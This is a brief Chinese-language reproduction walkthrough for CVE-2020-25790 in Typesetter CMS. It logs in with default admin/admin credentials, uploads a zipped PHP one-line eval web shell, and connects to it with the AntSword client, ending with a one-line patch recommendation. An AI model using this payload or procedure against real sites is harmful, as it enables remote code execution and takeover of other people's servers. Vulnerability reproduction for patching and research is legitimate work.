typesetter 文件上传(CVE-2020-25790)
漏洞简介:
Typesetter CMS 内容管理系统是Php源码频道下深受用户喜爱的软件。 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。
环境搭建:
在线环境 地址
漏洞复现:
访问首页
点击logged in 进入登录界面
账号密码: admin admin
创建一句话文件,压缩成压缩包
<?php @eval($_POST['cmd']);?>
将shell.zip进行上传
解压shell.zip压缩包
得到shell.php
点击shell.php发现可以访问
进行蚁剑连接
成功进入后台,获得shell
漏洞修复:
根据官方进行升级,打补丁